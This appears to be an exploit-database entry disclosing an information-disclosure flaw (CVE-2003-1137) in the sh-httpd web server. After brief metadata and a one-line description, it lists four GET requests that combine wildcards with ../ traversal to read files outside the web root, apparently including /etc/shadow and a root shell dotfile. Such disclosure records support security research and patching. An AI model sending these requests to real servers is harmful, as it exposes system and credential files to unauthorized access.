SH-HTTPD 0.3/0.4 - Character Filtering Remote Information Disclosure

Author: dong-h0un U
type: remote
platform: linux
port: 
date_added: 2003-10-27  
date_updated: 2012-12-11  
verified: 1  
codes: CVE-2003-1137;OSVDB-2721  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 23295.txt  

source: https://www.securityfocus.com/bid/8897/info

A problem has been identified in the handling of some characters by sh-httpd. Because of this, an attacker may be able to gain unauthorized access to information.


GET *
GET ../../../sh-httpd/p*
GET /../../etc/s*
GET ../../root/.b*